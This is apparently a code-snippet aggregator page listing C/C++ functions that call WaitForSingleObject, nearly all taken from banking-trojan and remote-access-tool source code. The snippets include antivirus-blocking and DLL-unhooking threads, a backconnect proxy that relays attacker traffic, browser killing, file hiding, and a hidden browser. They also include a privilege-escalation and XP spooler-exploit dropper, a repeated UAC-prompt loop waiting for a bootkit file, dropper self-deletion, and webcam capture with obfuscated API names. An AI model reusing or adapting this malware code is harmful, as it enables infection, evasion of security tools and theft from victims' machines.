Esempio n. 1
0
DWORD WINAPI AvFuckThread( LPVOID lpData )
{
	DisableDEP();
	UnhookDlls();

	HANDLE hBlockAV = StartThread( AvBlockThread, NULL );
	HANDLE hMiniAV  = StartThread( MiniAVThread, NULL );
	
	pWaitForSingleObject( hBlockAV, INFINITE );
	pWaitForSingleObject( hMiniAV, INFINITE  );
	
	pExitProcess( 1 );

	return 0;
}
Esempio n. 2
0
void DisconnBid( USHORT uBid )
{
	pWaitForSingleObject( hThreadMutex, INFINITE );

	int k = FindConn( uBid );

	if ( k != -1 )
	{
		ThreadConnection Conn = Connections[ k ];

		Connections[ k ].thread_s = INVALID_SOCKET;

		if ( Conn.thread_s != INVALID_SOCKET )
		{
			pshutdown( Conn.thread_s, FD_READ );
			pshutdown( Conn.thread_s, SD_SEND );

			pclosesocket( Conn.thread_s );
		}

		dwConnections--;

		if ( dwConnections )
		{
			Connections[ k ] = Connections[ dwConnections ];
		}
	}

	pReleaseMutex( hThreadMutex );

}
Esempio n. 3
0
void ManageNewConnection( SOCKET Socket, ULONG uIP, USHORT uCid, USHORT uPort)
{
	pWaitForSingleObject( hThreadMutex, INFINITE );

	 if ( dwConnections < MAX_CONN )
	 {
		  Connections[ dwConnections ].thread_s = INVALID_SOCKET;
		  Connections[ dwConnections ].s   = Socket;
		  Connections[ dwConnections ].ip   = uIP;
		  Connections[ dwConnections ].port  = uPort;
		  Connections[ dwConnections ].cid  = uCid;
		  Connections[ dwConnections ].bid  = (USHORT)dwBid + 1;

		  in_addr in;
		  in.S_un.S_addr = uIP;
		  Connections[ dwConnections ].thread_s  = NetConnect( (char*)pinet_ntoa( in ), uPort );

		  dwBid++;

		  DWORD ThreadId = 0;
		  dwConnections++; 


		  Connections[ dwConnections - 1 ].hThread = pCreateThread( NULL, 0, ConnectionThread, (void*)Connections[ dwConnections - 1 ].bid, 0, &ThreadId );
	 }

	 pReleaseMutex( hThreadMutex );
}
Esempio n. 4
0
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix)
{
	CHAR mutex_name[200];

	m_memset(mutex_name, 0, sizeof(mutex_name));

	PCHAR machine_id = MakeMachineID();
	m_lstrcat(mutex_name, "Global\\");
	m_lstrcat(mutex_name, MutexPrefix);
	m_lstrcat(mutex_name, machine_id);

	STR::Free(machine_id);

	LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name);

	SECURITY_ATTRIBUTES sa;
	SECURITY_DESCRIPTOR sd;

	pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
	pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);

	sa.nLength = sizeof (SECURITY_ATTRIBUTES);
	sa.lpSecurityDescriptor = &sd;
	sa.bInheritHandle = FALSE;

	HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name);
	if (mutex_handle == NULL) return false;

	// Catch ownership of mutex and never release
	DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000);
	if (wait_result == WAIT_OBJECT_0) return true;

	pCloseHandle(mutex_handle);
	return false;
}
Esempio n. 5
0
DWORD WINAPI HuntThred( LPVOID lpData )
{
//если есть файл на диске,то берём из него строку и запускаем сб
//внутри файла строка 127.0.0.1:5555
	if (HunterFileExists())
	{		
		Hunting();
		return 0;
	}	
	
	HANDLE tmp;
	while(true)
	{
		tmp= (HANDLE)pOpenMutexA(MUTEX_ALL_ACCESS,FALSE, (PCHAR)HunterMutexName);
		if ((DWORD)pWaitForSingleObject(tmp, INFINITE))
		{	
			if (HunterFileExists())//&&!IsSbStarted()
			{
				Hunting();
			}
			pSleep(90);
		}
		else
		{		
			Hunting();
			pCloseHandle(tmp);
			FileCreateInFolder(0x001a, (PWCHAR)HunterFileName,NULL,0);
			break;
		}
	}	
	return 0;
}
Esempio n. 6
0
	VOID WINAPI Hook_ExitProcess(UINT Code)
	{
		// Попытка завершить процесс, если
		// запущен поток загрузки плагина, то дожидаемся его завершения
		if (ThreadHandle != NULL)
			pWaitForSingleObject(ThreadHandle, INFINITE);

		Real_ExitProcess(Code);
	}
Esempio n. 7
0
void CManager::WaitForDialogOpen()
{
    char BrmAP30[] = {'W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t','\0'};
    WaitForSingleObjectT pWaitForSingleObject=(WaitForSingleObjectT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP30);
	pWaitForSingleObject(m_hEventDlgOpen, INFINITE);
	// 必须的Sleep,因为远程窗口从InitDialog中发送COMMAND_NEXT到显示还要一段时间
    char FBwWp25[] = {'S','l','e','e','p','\0'};
    SleepT pSleep=(SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp25);
	pSleep(150);
}
Esempio n. 8
0
LPBYTE CVideoCap::GetDIB()
{
	capGrabFrameNoStop(m_hWndCap);
	char CPolQ01[] = {'W','a','i','t','F','o','r','S','i','n','g','l','e','O','b','j','e','c','t','\0'};
	WaitForSingleObjectT pWaitForSingleObject=(WaitForSingleObjectT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ01);
	DWORD	dwRet = pWaitForSingleObject(m_hCaptureEvent, 3000);

	if (dwRet == WAIT_OBJECT_0)
		return m_lpDIB;
	else
		return NULL;
}
Esempio n. 9
0
SOCKET MyConnect( char *Host, int Port )
{
	LPHOSTENT lpHost = (LPHOSTENT)pgethostbyname( (const char*)Host );

	if ( lpHost == NULL )
	{
		return -1;
	}


	sockaddr_in SockAddr;

	SockAddr.sin_family		 = AF_INET;
	SockAddr.sin_addr.s_addr = **(unsigned long**)lpHost->h_addr_list;
	SockAddr.sin_port		 = (USHORT)phtons( (unsigned short)Port );

	ConnectionData connData;
	connData.SockAddr = SockAddr;
	for(int i=0; i<3; i++) {
		SOCKET Socket = (SOCKET)psocket( AF_INET, SOCK_STREAM, 0 );
		
		if( Socket == -1 )
			return -1;
		connData.Socket = Socket;

		HANDLE ConnectThreadHandle = (HANDLE)pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ConnectThread, &connData, NULL, 0);
		if((long)pWaitForSingleObject(ConnectThreadHandle, 10000) == WAIT_TIMEOUT)
		{
			if((int)pshutdown(Socket, 2) == SOCKET_ERROR)
			{
			}
			pTerminateThread(ConnectThreadHandle, 1);
		}
		DWORD exitCode = 0;
		BOOL res = (BOOL)pGetExitCodeThread(ConnectThreadHandle, &exitCode);

		//wsprintfA(&str[0], "EC:%d", exitCode);
		//OutputDebugStringA(&str[0]);

		if(res && exitCode == 0)
			return Socket;
	}


	return -1;
}
Esempio n. 10
0
static bool Exec( DWORD* exitCode, char *msg, ... )
{
    bool ret = false;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    if( exitCode ) *exitCode = 0;

    va_list mylist;
    va_start( mylist, msg );

	TMemory buf(1024);
    pwvsprintfA( buf.AsStr(), msg, mylist );	
    va_end(mylist);    

	ClearStruct(pi);
	ClearStruct(si);
    si.cb = sizeof(si);    

    pGetStartupInfoA(&si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = FALSE;

	DBG( "CreateProcess(): %s", buf.AsStr() );
    if( pCreateProcessA( NULL, buf.AsStr(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi) )
    {
        pWaitForSingleObject( pi.hProcess, INFINITE );

        if( exitCode )
            pGetExitCodeProcess( pi.hProcess, exitCode );

        pCloseHandle(pi.hThread);
        pCloseHandle(pi.hProcess);

        ret = TRUE;
    }
    else
        DBG( "CreateProcess() ERROR %d", pGetLastError() );

    return ret;
}
Esempio n. 11
0
void KillAllConnections()
{
	pWaitForSingleObject( hThreadMutex, INFINITE );

	for ( DWORD i = 0; i < dwConnections; i++ )
	{
		ThreadConnection Conn = Connections[ i ];

		pshutdown( Conn.thread_s, FD_READ );
		pshutdown( Conn.thread_s, SD_SEND );

		pclosesocket( Conn.thread_s );
	}

	m_memset( &Connections, 0, sizeof( ThreadConnection ) * dwConnections );

	dwConnections = 0;

	pReleaseMutex( hThreadMutex );

	return;
}
Esempio n. 12
0
void ExplorerStart(PEventData Data)
{

	// Создаём глобальный мьютекс, сигнализирующий о запущенном боте
	BOT::TryCreateBotInstance();


	// Инициализируем скрываемые файлы
    InitializeHiddenFiles();


	// Записываем текущие настроки в файл.
	// Запись осуществится только если записанных настроек нет
    BOT::SaveSettings(true, true, true);


	// Убиваем все запущенные браузеры
	KillAllBrowsers();

	#ifdef FakeDllInstallerH
    	FDI::Execute();
	#endif

	#ifdef BBSCBankH
		CBank::Start();
	#endif

	#ifdef JAVS_PATCHERH
		StartThread(Run_Path, NULL);
	#endif

	// Хукаем библиотеку WinInet
	#ifdef InternetExplorerH
		HookInternetExplorer();
	#endif

	// Запускаем модуль живучести
	#ifdef KeepAliveH
		KeepAliveCheckProcess(PROCESS_SVCHOST);
		#ifdef VideoRecorderH
			#ifdef VideoProcessSvchost
				KeepAliveCheckProcess(PROCESS_VIDEO);
			#endif 
		#endif
	#endif


	// Проверяем систему киберплат
	#ifdef CyberPlatDLLH
		CyberPlatCheckInstalled(); 
	#endif

	#ifdef CmdLineH
		HookCmdLine();
	#endif

	#ifdef BOTMONITOR
    	PIPE::CreateProcessPipe((PCHAR)BotMonitor::ProcessExplorer, true);
	#endif

	#ifdef BitcoinH
		BitcoinRunAfterReboot();
	#endif

	#ifdef VideoRecorderH
		VideoProcess::ConnectToServer( 0, true );
	#endif

	// Запуск потока скрытого браузера.
	// ВАЖНО! Вызов должен вызываться в последнюю очередь
	#ifdef StealthBrowserH
		HANDLE H = StartThread( RunIeSB/*SellExecute*/, NULL );// запускаем поток отвечающеий за запуск браузера
		pWaitForSingleObject(H, INFINITE);
	#endif

}
Esempio n. 13
0
void SessionWork( SOCKET Socket )
{
	PCONNECTIONS pConnect = (PCONNECTIONS)MemAlloc( sizeof( PCONNECTIONS ) );

	m_memset( pConnect, 0, sizeof( PCONNECTIONS ) );

	char *Data = NULL;

	while ( 1 )
	{
		if ( !WaitRecv( Socket, 60*60 ) )
		{
			break;
		}

		TPkt tPacket;

		if ( !NetRecv( Socket, (char*)&tPacket, sizeof( tPacket ) ) )
		{
			break;
		}

		if ( tPacket.QType == 0x63 )
		{

			if ( tPacket.dwLen != 6 )
			{
				break;
			}

			if ( Data )
			{
				MemFree( Data );
			}

			Data = (char *)MemAlloc( tPacket.dwLen + 1 );

			if ( Data == NULL )
			{
				break;
			}

			if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
			{
				break;
			}

			ManageNewConnection( Socket, *(ULONG*)Data, (USHORT)tPacket.dwReserved, *(USHORT*)&Data[4] );
		}
		else if ( tPacket.QType == 0x73 )
		{
			if ( Data )
			{
				MemFree( Data );
			}

			Data = (char *)MemAlloc( tPacket.dwLen + 1 );

			if ( Data == NULL )
			{
				break;
			}

			if ( !NetRecv( Socket, Data, tPacket.dwLen ) )
			{
				break;
			}
			
			BcDecrypt( Data, tPacket.dwLen );

			ThreadConnection Conn;
			pWaitForSingleObject( hThreadMutex, INFINITE );

			int k = FindConn( (USHORT)tPacket.dwReserved );

			if ( k != -1 )
			{
				Conn = Connections[ k ];
				NetSend( Conn.thread_s, Data, tPacket.dwLen );
			}

			pReleaseMutex( hThreadMutex );
		}
		else if ( tPacket.QType == 0x77 )
		{
			DisconnBid( tPacket.dwReserved );
		} 
		else if ( tPacket.QType == 0x64 )
		{
			pclosesocket(Socket);
			KillAllConnections();
			pExitThread( 1 );			
			break;
		} 
		else if ( tPacket.QType == 0x65 )
		{
		} 
		else
		{
			break;
		}
	}

	if ( Data )
	{
		MemFree( Data );
	}

	pConnect->dwStatus = 1;
}
Esempio n. 14
0
bool AsyncDownload( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
	char *Host = NULL;
	char *Path = NULL;
	int   Port = 0;

	if ( !ParseUrl( Url, &Host, &Path, &Port ) )
	{
		return false;
	}


	PASYNCHTTP pData = (PASYNCHTTP)MemAlloc( sizeof( PASYNCHTTP ) );

	if ( !pData )
	{
		return false;
	}

	pData->hConnectedEvent		 = pCreateEventW( NULL, FALSE, FALSE, NULL );
    pData->hRequestOpenedEvent	 = pCreateEventW( NULL, FALSE, FALSE, NULL );
    pData->hRequestCompleteEvent = pCreateEventW( NULL, FALSE, FALSE, NULL );

	char *UserAgent = (char*)MemAlloc( 1024 );

	DWORD dwUserSize = 1024;

	pObtainUserAgentString( 0, UserAgent, &dwUserSize );

	pData->hInstance = (HINTERNET)pInternetOpenA( UserAgent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC );

	LPBYTE lpBuf	 = NULL;
	DWORD  dwBufSize = 0;

	if ( pData->hInstance )
	{
		if ( pInternetSetStatusCallback( pData->hInstance, (INTERNET_STATUS_CALLBACK)&Callback) != INTERNET_INVALID_STATUS_CALLBACK)
		{
			pData->dwCurrent = 1;
			pData->hConnect  = (HINTERNET)pInternetConnectA( pData->hInstance, Host, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)pData );
			
			if ( !pData->hConnect )
			{
				if ( pGetLastError() != ERROR_IO_PENDING )
				{
					return false;
				}
				
				pWaitForSingleObject( pData->hConnectedEvent, INFINITE );
			}

			pData->dwCurrent = 2;
			pData->hRequest  = (HINTERNET)pHttpOpenRequestA( pData->hConnect, "GET", Path, NULL, NULL, NULL, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, (DWORD_PTR)pData );

			if ( !pData->hRequest )
			{
				if ( pGetLastError() != ERROR_IO_PENDING )
				{
					return false;
				}

				pWaitForSingleObject( pData->hRequestOpenedEvent, INFINITE );
			}

			if ( !(BOOL)pHttpSendRequestA( pData->hRequest, NULL, 0, NULL, 0 ) )
			{
				if ( pGetLastError() != ERROR_IO_PENDING )
				{
					return false;
				}
			}

			pWaitForSingleObject( pData->hRequestCompleteEvent, INFINITE );

			LPBYTE pTmpBuf = (LPBYTE)MemAlloc( 4096 );

			if ( !pTmpBuf )
			{
				return false;
			}

			INTERNET_BUFFERSA ib;

			m_memset( &ib, 0, sizeof( INTERNET_BUFFERSA ) );
			
			ib.dwStructSize   = sizeof( INTERNET_BUFFERSA );
			ib.lpvBuffer	  = pTmpBuf;
			

			do
			{
				ib.dwBufferLength = 4096;

				if ( !(BOOL)pInternetReadFileExA( pData->hRequest, &ib, 0, 2 ) )
				{
					if ( pGetLastError() == ERROR_IO_PENDING)
					{
						pWaitForSingleObject( pData->hRequestCompleteEvent, INFINITE );
					}
					else
					{
						return false;
					}
				}

				if ( ib.dwBufferLength )
				{
					if ( !lpBuf )
					{
						if ( !( lpBuf = (LPBYTE)MemAlloc( ib.dwBufferLength + 1 ) ) )
						{
							return false;
						}
					}
					else
					{
						LPBYTE p = (LPBYTE)MemRealloc( lpBuf, dwBufSize + ib.dwBufferLength + 1 );

						if ( !p )
						{
							return false;
						}

						lpBuf = p;
					}

					m_memcpy( lpBuf + dwBufSize, pTmpBuf, ib.dwBufferLength );
					dwBufSize += ib.dwBufferLength;
				}
				else
				{
					pData->IsDownloaded = true;
				}

			} while ( !pData->IsDownloaded );
		}
	}

	pInternetCloseHandle( pData->hRequest  );
	pInternetCloseHandle( pData->hConnect  );
	pInternetCloseHandle( pData->hInstance );

	pCloseHandle( pData->hConnectedEvent       );
	pCloseHandle( pData->hRequestOpenedEvent   );
	pCloseHandle( pData->hRequestCompleteEvent );


	MemFree( pData );
	

	if ( dwSize )
	{
		*lpBuffer  = lpBuf;
		*dwSize    = dwBufSize;

		return true;
	}

	return false;
}
Esempio n. 15
0
DWORD WINAPI ConnectionThread( LPVOID lpData )
{
	int bid = (int)lpData;

	ThreadConnection Conn;
	pWaitForSingleObject( hThreadMutex, INFINITE );

	int k = FindConn( bid );

	if ( k != -1 )
	{
		Conn = Connections[ k ];
	}

	pReleaseMutex(hThreadMutex);

	if ( k != -1 )
	{
		if ( Conn.thread_s != INVALID_SOCKET )
		{
			pWaitForSingleObject( hThreadMutex, INFINITE );

			k = FindConn( bid );

			if ( k != -1 )
			{
				Connections[ k ].thread_s = Conn.thread_s;
			}

			pReleaseMutex( hThreadMutex );

			pWaitForSingleObject( hSockMutex, INFINITE );

			SendStatus( Conn.s, bid, Conn.cid, TRUE );

			pReleaseMutex( hSockMutex );

			char data[1024];

			while ( 1 )
			{
				int r = (int)precv( Conn.thread_s, data, 1024, 0 );

				if ( r == 0 || r == SOCKET_ERROR )
				{
					pWaitForSingleObject( hSockMutex, INFINITE );

					TPkt tPacket;

					tPacket.dwLen		 = 0;
					tPacket.QType	 = 0x77;
					tPacket.dwReserved = bid;
					
					NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );

					pReleaseMutex( hSockMutex );

					break;
				}

				pWaitForSingleObject( hSockMutex, INFINITE );

				TPkt tPacket;

				tPacket.dwLen	   = r;
				tPacket.QType	   = 0x73;
				tPacket.dwReserved = bid;

				NetSend( Conn.s, (char*)&tPacket, sizeof( tPacket ) );

				BcDecrypt( data, r );
				
				if ( !NetSend( Conn.s, data, r ) ) 
				{
					pReleaseMutex( hSockMutex );
					break;
				}
				pReleaseMutex( hSockMutex );
			}
		} 
		else
		{
			SendStatus( Conn.s, bid, Conn.cid, FALSE );
		}
	}

	DisconnBid( bid );

	return 0;
}
Esempio n. 16
0
void DebugReportCreateConfigReportAndSend()
{
	PCHAR MsInfoPath = NULL;
	PCHAR MsInfoParam = NULL;
	PCHAR ReportPath = NULL;
	PCHAR CabPath = NULL;

	DebugReportSettings* settings = DebugReportGetSettings();
	DBGRPTDBG("DebugReportCreateConfigReportAndSend",
		"Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'",
		settings->Enabled, settings->StatPrefix, settings->StatUrl
		);

	if (!settings->Enabled) return;

	do
	{
		// Получаем путь к msinfo32.exe
		MsInfoPath = GetPathToMsInfo32();
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath);
		if (MsInfoPath == NULL) break;

		// Временный файл для отчета
		ReportPath = File::GetTempNameA();
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath);
		if (ReportPath == NULL) break;

		MsInfoParam = STR::Alloc(2 * MAX_PATH);
		if (MsInfoParam == NULL) break;

		PROCESS_INFORMATION pi;
		STARTUPINFOA si;

		m_memset(&si, 0, sizeof(si));
		m_memset(&pi, 0, sizeof(pi));
		m_memset(MsInfoParam, 0, STR::Length(MsInfoParam));

		// Запускаем скрытно
		si.cb = sizeof(si);
		si.wShowWindow = SW_HIDE;
		
		m_lstrcat(MsInfoParam, " /report \"");
		m_lstrcat(MsInfoParam, ReportPath);
		m_lstrcat(MsInfoParam, "\"");
		
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')",
			MsInfoPath, MsInfoParam);

		BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)",
			process_result, pi.hProcess, pi.dwProcessId);

		if (process_result == FALSE) break;
		if (pi.hProcess == NULL) break;

		if (pi.hProcess != NULL)
		{
			DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32.");
			pWaitForSingleObject(pi.hProcess, INFINITE);
			pCloseHandle(pi.hProcess);
		}

		if (pi.hThread != NULL) pCloseHandle(pi.hThread);

		DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath);
		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.",
			ReportPath, attributes);
		if (attributes == INVALID_FILE_ATTRIBUTES) break;

		CabPath = File::GetTempNameA();
		HCAB CabHandle = CreateCab(CabPath);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.",
			CabHandle);

		if (CabHandle == NULL) break;

		AddFileToCab(CabHandle, ReportPath, "sysinfo.txt");
		CloseCab(CabHandle);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report.");

		string BotUid = GenerateUidAsString(settings->StatPrefix);
		DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath);

		DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent.");
	}
	while (false);

	if (ReportPath != NULL) pDeleteFileA(ReportPath);
	if (CabPath != NULL)    pDeleteFileA(CabPath);

	if (ReportPath != NULL) STR::Free(ReportPath);
	if (CabPath != NULL)    STR::Free(CabPath);
	if (MsInfoPath != NULL) STR::Free(MsInfoPath);

	DebugReportFreeSettings(settings);

	DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished.");
}
Esempio n. 17
0
// Ф-ция, которая вызывается при инжекте в другие процессы.
// Проверяет свои права и пробует их расширить для 
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
	// 
	//	Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты.
	//
	
	BOOL bRun = TRUE;
	BOOL bRet = FALSE;
	BOOL IsUsedExploit = FALSE;
	OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};

	UnhookDlls();

	BuildImport((PVOID)GetImageBase());

	PP_DPRINTF(L"ExplorerRoutine: started");

	if (! IsUserAdmin() )
	{
		PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;	
		};

		PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
		IsUsedExploit = TRUE; // По идее это всегда TRUE
	};		

	if ( bRun )
	{
		PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
	}
	
	/*		Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал		*/
	if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");

		IsUsedExploit = TRUE;
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;
		};
		if ( bRun )
		{
			PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
			bRet = ExplorerMain();
			PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
		}
	};

	pGetVersionExA(&OSVer);

	
	/*		Выкидываем длл на диск и юзаем  сплойт спуллера, только XP		*/
	if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");

		DWORD DropSize = 0;	
		PVOID DropImage  = GetSectionData("DROPER_DLL",&DropSize);
		if ( DropImage && DropSize)
		{
			PCHAR DropFile = File::GetTempNameA();
			File::WriteBufferA(DropFile,DropImage,DropSize);
			SpoolerBypass(DropFile);
			STR::Free(DropFile);
		};
	};


	/*		Запуск много раз копии дропера с прошением повышенных прав.		*/
	if (  bRet == FALSE )
	{
		PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");

		PCHAR tmpexe,dir,file ;
		PCHAR tmp_manifest;
		PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
		
		if ( NamePrefix )
		do 
		{

			tmpexe = File::GetTempNameA();
			tmp_manifest = STR::Alloc(MAX_PATH+1);
			
			dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
			file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
		
			if (  tmp_manifest && dir && file)
			{
				STR::Free(tmpexe);
				tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
				if ( ! tmpexe )
					return 0;
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,".manifest");
			};

			if ( tmpexe && tmp_manifest )
			if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
			{
				
				DWORD dwCode = -1;
				SHELLEXECUTEINFOA ExecInfo;
				
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,"   ");
				m_lstrcat(tmp_manifest,ARGV_UAC_RUN);

				ExecInfo.cbSize = sizeof(ExecInfo);
				ExecInfo.lpFile = tmpexe;
				ExecInfo.lpParameters = tmp_manifest;
				ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;

				for ( int i = 0; i < 10; ++i )
				{
					PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);

					if ( pShellExecuteExA(&ExecInfo) == FALSE )
						break;

					pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
					pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
					if ( dwCode == 0  )
					{
						PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
						break;
					}
				}
			};
			
			if ( tmpexe )
				STR::Free(tmpexe);
			if ( tmp_manifest )
				STR::Free(tmp_manifest);
			if ( dir )
				STR::Free(dir);
			if ( file )
				STR::Free(file);
		}
		while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) );	//	end do, цикл пока не появится Файл буткита

		if ( NamePrefix )
			STR::Free(NamePrefix);
	};

	/*		Если инстал был не удачный снова пробуем вдруг повезет*/
	if ( bRet  == FALSE)
	{
		PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
	}

	/*	 Удаляем дропер	*/
	PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
	pCloseHandle(StartThread(DeleteDropper,NULL));
	
	if ( dwExplorerSelf )
	{
		PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
		pExitProcess(0);
	}

	return 0;
}